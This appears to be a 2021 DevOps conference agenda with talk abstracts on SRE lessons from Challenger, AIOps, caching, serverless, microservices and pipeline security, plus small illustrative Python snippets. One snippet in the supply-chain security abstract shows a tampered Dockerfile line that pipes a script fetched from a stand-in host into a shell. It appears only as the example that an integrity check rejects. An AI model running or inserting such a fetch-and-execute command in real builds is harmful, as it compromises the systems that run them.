Workshop Stage 1
Tuesday, September 14, 2021
The Space Shuttle was the most advanced machine ever designed. It was a triumph and a marvel of the modern world.
In January 1986, the shuttle Challenger disintegrated just seconds after launch. This session will discuss how and why the disaster occurred and what lessons modern DevOps and Site Reliability Engineers should learn from it.
The Challenger disaster was not only a failure of the technology, but a failure of the engineering and management culture at NASA. While engineers were aware of problems in the technology stack, there was not enough awareness of the risks those problems actually posed to the spacecraft. Management had shifted the burden of proof from “prove that it’s safe to launch” to “prove that it’s unsafe to launch”.
This session will present the risk analysis (or lack thereof) of the Shuttle program and draw parallels to modern software development. In the end, launching a shuttle is an extremely complex deployment to the cloud… and above it.
Too often we encounter the idea that software architecture is an esoteric subject that only the chosen ones, and only at the right time, are allowed to discuss. Well, how about a little change of perspective? With software development and users' needs evolving so fast, we cannot afford the luxury of rewriting systems from scratch just because teams fail to understand what they are building. Today’s software developers are tomorrow's architects. We must challenge them to step away from the IDE and understand how the architecture evolves, in order to create a common and stable ground in terms of quality, performance, reliability, and scalability. At the same time, software architects need to step away from the abstractions and stay up to date with the reality of project development. This session revolves around finding the right ways of intertwining up-front architecture, API design & coding while maintaining a continuous focus on architecture evolution.
The journey to No-Ops (No Operations) always begins with two key objectives:
• Extreme automation
• No “dedicated” infrastructure teams, ever!
In this era of tech evolution, even though we are already in the middle of the Industry 4.0 revolution, there is no unified, singular framework for adopting No-Ops. Everyone has a different take on what No-Ops means to them. While for some the idea of evolving their systems toward minimal operations is exciting, for others it is more a way to refine the management of teams and channel their efforts into development. Whatever it may be, losing operations specialists entirely is still a distant dream. Maybe we are so dependent on managed Ops that unplugging it in any major way is a nightmare to even think of.
Even with the continuous growth of CD tooling and the plethora of extensions now available in the DevOps ecosystem, and even though we have achieved and reaped quantifiable benefits from these implementations, scaling them across organizational divisions is becoming a visible challenge.
Even after introducing more evolutionary controls, such as templated provisioning and orchestration, immunized integrations and connectors, and extended deep-monitoring systems, uncertainty and unreliability remain common problems across transformation scoring charts.
Revolutionary practices like Chaos Engineering, auto-enabled SRE, and AIOps are creating aspirational backlogs for business units that are still struggling to manage their existing implementations.
With Ops amalgamated into development, and with transformational approaches such as microservices and containerization, applications are indeed becoming more complex to manage as well.
Current Ops management is already beyond the scope of manual administration, and it will only get worse in the years to come because of the growing complexity of applications.
It’s time to introduce the friend that DevOps & CD automation have needed for a good long time. Welcome, No-Ops!
A few key highlights of the talk:
1. In the DevOps Ecosystem
a. With Speed & Agility comes Responsibility
b. The Human-limitations aspect of evolution
2. DevOps + AIOps – How will the match go?
3. AIOps – A Few Key Enablers
a. Market Analysis – what the future holds
b. How to integrate with your current tools
c. The Entire Framework
d. How to properly extend DevOps with AIOps
e. How it enables SRE Teams
f. Interesting Use Cases
4. The Road Ahead
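To make the AIOps idea concrete, here is a minimal sketch of the kind of automated anomaly detection an AIOps pipeline might start from (the function name and numbers are illustrative, not any particular product's API): a rolling z-score over latency samples.

```python
from statistics import mean, stdev

def find_anomalies(samples, window=5, threshold=3.0):
    """Flag samples that deviate from the trailing window by more than
    `threshold` standard deviations (a toy AIOps-style detector)."""
    anomalies = []
    for i in range(window, len(samples)):
        history = samples[i - window:i]
        mu, sigma = mean(history), stdev(history)
        if sigma > 0 and abs(samples[i] - mu) / sigma > threshold:
            anomalies.append(i)
    return anomalies

latencies = [102, 99, 101, 100, 98, 103, 540, 101, 99]  # ms; one spike
print(find_anomalies(latencies))  # the spike at index 6 is flagged
```

A real AIOps system would of course learn seasonality and correlate across many signals, but the point stands: detection and response that no longer require a human watching a dashboard.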
Do you want to detect the license plate of a car? Or whether people are wearing their masks? Nowadays these are typical examples of object detection and image classification that are easy in theory, but what about the actual deployment? There are many options, from the edge to the cloud, for how you could do it. Let me show you the simplest ones, along with a comparison when it comes to the platform question.
I will use cloud-managed Cisco Meraki IP cameras together with SaaS computer vision platforms, for example from AWS, Azure, and GCP, to showcase the simple deployment, possible integrations via APIs & MQTT, and the whole architecture as well as actual outcomes.
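To give a feel for the SaaS side, these vision platforms return labeled detections with confidence scores; AWS Rekognition's DetectLabels, for instance, returns a list of labels with Confidence values. A minimal sketch of filtering such a response on the consuming side (the response data here is made up for illustration):

```python
# A DetectLabels-style response (structure modeled on AWS Rekognition;
# the label values and scores here are invented for illustration).
response = {
    "Labels": [
        {"Name": "Car", "Confidence": 98.1},
        {"Name": "License Plate", "Confidence": 91.4},
        {"Name": "Tree", "Confidence": 55.0},
    ]
}

def confident_labels(resp, min_confidence=90.0):
    """Keep only detections above a confidence threshold."""
    return [label["Name"] for label in resp["Labels"]
            if label["Confidence"] >= min_confidence]

print(confident_labels(response))  # ['Car', 'License Plate']
```

In the demo the same shape of result arrives from each platform, which is what makes an apples-to-apples comparison possible.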
Wix operates at a huge scale of traffic: more than 500 billion HTTP requests and more than 1.5 billion Kafka business events per day.
This talk goes through 4 caching patterns used by Wix's 1500 microservices to provide the best experience for Wix users while saving costs and increasing availability.
A cache will reduce latency by avoiding a costly query to a DB, an HTTP request to another Wix service, or a call to a 3rd-party service, and it will reduce the scale needed to serve these costly requests.
It will also improve reliability, by making sure some data can be returned even if the aforementioned DB or 3rd-party service is currently unavailable.
The patterns include:
* Configuration Data Cache - persisted locally or to S3
* HTTP Reverse Proxy Caching - using Varnish Cache
* Kafka-topic-based 0-latency Cache - utilizing compacted logs
* (Dynamo)DB+CDC based Cache and more - for unlimited capacity with continuously updating LRU cache on top
Each pattern is optimal for different use cases, but all of them reduce costs and improve performance and resilience.
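To illustrate the reliability point, here is a minimal sketch (hypothetical names, not Wix's actual implementation) of a read-through cache that falls back to the last known stale value when the backing store is unavailable:

```python
import time

class StaleTolerantCache:
    """Read-through cache: serve a fresh value when possible, fall back
    to the last known (stale) value if the loader fails."""

    def __init__(self, loader, ttl_seconds=60):
        self.loader = loader          # e.g. a DB query or HTTP call
        self.ttl = ttl_seconds
        self.store = {}               # key -> (value, fetched_at)

    def get(self, key):
        entry = self.store.get(key)
        if entry and time.time() - entry[1] < self.ttl:
            return entry[0]                       # fresh hit
        try:
            value = self.loader(key)              # refresh from origin
            self.store[key] = (value, time.time())
            return value
        except Exception:
            if entry:
                return entry[0]                   # stale, but available
            raise

def broken_backend(key):
    raise ConnectionError("backend down")

cache = StaleTolerantCache(lambda k: k.upper(), ttl_seconds=0)
cache.get("site")            # loads and caches "SITE"
cache.loader = broken_backend  # simulate an outage
print(cache.get("site"))     # still answers from the stale entry
```

This is the essence of trading a little staleness for availability; the patterns in the talk apply the same trade-off at very different scales.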
Event-driven, real-time development in the cloud is a major part of many organizations’ digital transformation initiatives and businesses realize that data is the currency of competitive advantage. Event-driven applications must consume, enrich, and deliver data securely in real-time, and efficiently at scale. Therefore, the size of data packets, speed and frequency of data transmission and update, and the “intelligence” of data handling, are critical to successfully running mission-critical, corporate applications and making time-sensitive business decisions.
The core expertise of many companies lies in the development of their business applications, not in developing streaming data technology. As organizations everywhere move to the cloud, the demand for the dynamic enrichment, management and security of real-time, inflight data is critical. The fundamental challenge of developing event-driven, real-time applications and systems for the cloud, is managing the complexity of the end-to-end journey from sources to recipients of the highly “perishable” data – fast, reliably, securely, often in large volume, and sometimes to many recipients (hundreds of thousands of applications, systems, and devices concurrently). This talk will highlight how an Intelligent Event Data Platform enables organizations to accelerate innovation and deliver game-changing, real-time applications to market faster, while significantly reducing the cost of software development and operations.
In the demo:
* We will see how to develop an Angular SPA, host it on Azure Static Web Apps, and use the integrated API (Azure Functions) to develop our translator modules and authentication.
* We will see how to use workflows in Azure Logic Apps to trigger an invite mail once a user logs in to our application.
* Finally, we will also cover serverless Cosmos DB, which is used as our persistence layer.
We went from a single monolith to a set of microservices that are small, lightweight, and easy to implement. Microservices enable reusability, make it easier to change and scale apps on demand but they also introduce new problems. How do microservices interact with each other toward a common goal? How do you figure out what went wrong when a business process composed of several microservices fails? Should there be a central orchestrator controlling all interactions between services or should each service work independently, in a loosely coupled way, and only interact through shared events? In this talk, we’ll explore the Choreography vs Orchestration question and see demos of some of the tools that can help.
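To ground the question, here is a toy sketch (all names hypothetical) contrasting the two styles: an orchestrator that explicitly calls each service in order, versus services that only react to events on a shared bus:

```python
# Orchestration: a central coordinator knows and invokes every step.
def charge(order):
    return {"order": order["id"], "paid": True}

def ship(order, payment):
    return {"order": order["id"], "shipped": True}

def notify(order, shipment):
    return "done"

def orchestrate_order(order):
    payment = charge(order)        # the orchestrator owns the flow
    shipment = ship(order, payment)
    return notify(order, shipment)

# Choreography: services subscribe independently; no one owns the flow.
subscribers = {}   # event name -> list of handlers

def subscribe(event, handler):
    subscribers.setdefault(event, []).append(handler)

def publish(event, payload, log):
    log.append(event)
    for handler in subscribers.get(event, []):
        handler(payload, log)

subscribe("order_placed", lambda o, log: publish("payment_charged", o, log))
subscribe("payment_charged", lambda o, log: publish("order_shipped", o, log))

log = []
publish("order_placed", {"id": 1}, log)
print(orchestrate_order({"id": 1}))
print(log)   # the same business flow emerges from local reactions
```

The orchestrated version is easy to reason about but couples everything to the coordinator; the choreographed one is loosely coupled but makes the end-to-end flow harder to see, which is exactly the trade-off the talk explores.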
Azure Functions is the serverless offering from Microsoft on Azure, enabling many use cases to be fulfilled without the need to worry about servers. By responding to events within the Azure platform, Functions can address a wide variety of use cases and situations. Perhaps their most important role is as the "glue" for event-driven architectures, mainly through supported bindings.
In this talk, we will walk through the most commonly used bindings and illustrate ways larger systems can be constructed by gluing Azure service offerings together using Functions.
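As a language-agnostic illustration of the binding idea (a hypothetical mini-framework, not the actual Azure Functions SDK), a trigger binding delivers the event to your code and the platform handles the plumbing on both sides:

```python
# Hypothetical mini-framework mimicking trigger/output bindings.
bindings = {}

def queue_trigger(queue_name):
    """Register a function to run when a message lands on a queue."""
    def register(fn):
        bindings[queue_name] = fn
        return fn
    return register

blob_store = {}   # stands in for an output binding's destination

@queue_trigger("orders")
def process_order(message):
    # Only business logic lives here; delivery and storage are
    # the platform's job, which is what makes bindings "glue".
    blob_store[message["id"]] = f"processed:{message['payload']}"
    return blob_store[message["id"]]

def simulate_queue_event(queue_name, message):
    """Stand-in for the platform dispatching an event to the function."""
    return bindings[queue_name](message)

print(simulate_queue_event("orders", {"id": "42", "payload": "book"}))
```

In real Azure Functions the trigger and output are declared rather than hand-wired, but the shape is the same: an event in, your code in the middle, a service on the way out.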
Both Box and Split, like many other companies, are working to split their monoliths into microservices. We didn't want to just end up with a distributed monolith (i.e. lots of services that still have a very high level of interdependency), so this required some specific thinking. Additionally, we wanted to think about how to avoid the overhead of hundreds of services while also not ending up with several mini-monoliths. In order to design our new services, we approached the problem using domain-driven design and layered architecture.
DDD is an approach to developing software for complex needs by deeply connecting the implementation to an evolving model of the core business concepts. The term was coined in 2004, but the approach is still very applicable today. It emphasizes problem solving, cross-functional collaboration, and simplicity.
Layered architecture, by contrast, is a fairly common approach but does not have the same common language or formalized concepts that domain-driven design has. We used layered architecture as a way to think about how to separate our front-end services, our core logic, and our infrastructure services.
Together, these two approaches helped us think through how and where to divide our services. In this talk, I will go into much more depth about what each of these two approaches are, as well as how we applied each to our problem space at Split.
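As a minimal sketch of how the two approaches fit together (the domain here is hypothetical, not Split's actual code): a domain model stays free of infrastructure, a repository hides storage, and an application-layer use case glues them:

```python
from dataclasses import dataclass

# Domain layer: core business concepts, no infrastructure dependencies.
@dataclass
class Account:
    owner: str
    balance: int

    def deposit(self, amount: int):
        if amount <= 0:
            raise ValueError("deposit must be positive")
        self.balance += amount

# Infrastructure layer: storage details, swappable behind an interface.
class InMemoryAccountRepository:
    def __init__(self):
        self._accounts = {}

    def save(self, account):
        self._accounts[account.owner] = account

    def find(self, owner):
        return self._accounts[owner]

# Application layer: orchestrates one use case across the layers below.
def deposit_use_case(repo, owner, amount):
    account = repo.find(owner)
    account.deposit(amount)
    repo.save(account)
    return account.balance

repo = InMemoryAccountRepository()
repo.save(Account("ada", 100))
print(deposit_use_case(repo, "ada", 50))  # 150
```

The service boundary question then becomes: which domain concepts belong together, and which layers must never leak across a service's edge.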
Wednesday, September 15, 2021
As businesses continue to expose information through APIs, API programming has grown significantly and the number of API endpoints available has increased by leaps and bounds. An integration consuming a set of such APIs needs to adhere to the SLAs agreed with customers. In the era of cloud integration platforms, making sure that your cloud-based integration performs up to scratch is not simple.
Integration-based development increases the risk of performance mistakes in the code compared to traditional programs that do not depend on external services. Since developers combine multiple services or APIs with unknown performance characteristics, these mistakes are usually missed during development. With the help of artificial intelligence (AI), integrated development environments (IDEs) can take up the burden of helping engineers write performant code.
In this session, I will talk about how to use both AI and theoretical performance models to provide accurate performance forecasts for API integrations. I will demonstrate how this approach can be useful for inexperienced developers to write performant code.
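At its simplest, a theoretical performance model composes the known latency estimates of the upstream APIs. A hedged sketch with illustrative numbers (the API names and figures are invented):

```python
def sequential_latency(calls):
    """Calls awaited one after another add up."""
    return sum(calls.values())

def parallel_latency(calls):
    """Calls issued concurrently cost only the slowest one."""
    return max(calls.values())

# Hypothetical p95 latencies (ms) for three upstream APIs.
api_p95 = {"payments": 120, "inventory": 80, "shipping": 200}

print(sequential_latency(api_p95))  # 400
print(parallel_latency(api_p95))    # 200
```

An IDE armed with such estimates, refined by AI from observed traffic, can warn a developer at edit time that a chain of sequential calls will blow the SLA, and suggest parallelizing independent ones.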
Microsoft's CEO Satya Nadella has said: "Human language is the new UI layer, bots are like new applications". As more and more bots become popular in homes and enterprises, the demand for custom bots is increasing at a rapid pace. In the post-COVID-19 pandemic world, we are seeing a high uptick in self-service chat-bots.
However, according to the latest study by Gartner, more than eighty percent of chat-bot projects failed in 2019.
In this session, we will cover how to successfully roll out chat-bots in the enterprise space.
We will talk about the factors that contribute to the failure of chat-bot implementations, how we can learn from them, and how to avoid them. We will also show how to create enterprise-grade chat-bots using the latest offerings in the Microsoft conversational AI space.
You will learn:
Common factors that contribute to the failure of chat-bot implementations
How to use the latest offerings in the Microsoft conversational AI space to create enterprise-grade chat-bots
Best practices for chat-bot implementation
You can find talks demonstrating how some security tools work in isolation, but what about a closer-to-life scenario showing how to introduce security throughout development, deployment, and runtime?
This is the demo that will finally fill that gap! Attendees will be able to take back knowledge and get a head start in introducing security everywhere in their SDLC.
We’ll see a hands-on demonstration of how to use a variety of tools under the CNCF to dramatically enhance the security of any environment:
- in-toto will help us ensure the integrity of our software from development to deployment
- Kyverno will allow us to define policies in our environment to guarantee compliance
- We’ll use Notary to sign our Docker images, and finally
- Falco will notify us if any threats are identified at runtime in our Kubernetes cluster
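The integrity guarantees these tools provide ultimately rest on one idea: what you deploy must be bit-for-bit what you built, attested by cryptography. A stripped-down illustration of that core check (this is not in-toto's or Notary's actual API, just the underlying digest comparison):

```python
import hashlib

def digest(artifact: bytes) -> str:
    """Content address of an artifact, as supply-chain tools use it."""
    return hashlib.sha256(artifact).hexdigest()

# The build step records the digest of what it produced...
built = b"FROM alpine:3.18\nCOPY app /app\n"
recorded = digest(built)

# ...and the deploy step refuses anything that does not match.
def verify(artifact: bytes, expected: str) -> bool:
    return digest(artifact) == expected

print(verify(built, recorded))                          # True
print(verify(built + b"RUN curl bad.sh | sh\n", recorded))  # False
```

in-toto layers signed link metadata over each step, and Notary signs the digests themselves, but every layer bottoms out in a comparison like this one.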
Most CI/CD pipelines used by DevOps teams rely on integrations with services such as APIs, databases, and other critical systems to complete their workflows. These integrations usually require the use of extremely sensitive secrets such as passwords, tokens, or certificates, which must be securely protected at all times. Unauthorized access to these pipeline secrets opens these systems to threats from bad actors and illegal access of data.
In this talk, Angel will discuss common pain points in properly securing applications and CI/CD pipelines and in protecting sensitive access gates to integration targets. Attendees will learn strategies to secure their applications, sensitive data, and pipeline integration points, and will leave with a better understanding of how to implement security layers that can improve their pipeline security posture.
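One baseline strategy is to keep secrets out of pipeline definitions entirely: inject them at runtime, fail fast when they are missing, and mask them in anything that might be logged. A minimal sketch (the variable and secret names are hypothetical):

```python
import os

def require_secret(name: str) -> str:
    """Fetch a secret from the environment, failing fast if missing."""
    value = os.environ.get(name)
    if not value:
        raise RuntimeError(f"secret {name} is not set")
    return value

def masked(secret: str) -> str:
    """Never log the raw secret; show only enough to identify it."""
    return secret[:2] + "*" * (len(secret) - 2)

os.environ["DEPLOY_TOKEN"] = "tok_s3cr3t"  # injected by the CI system
token = require_secret("DEPLOY_TOKEN")
print(masked(token))  # to********
```

Dedicated secret managers add rotation, audit trails, and short-lived credentials on top, but even they depend on the pipeline never echoing the raw value.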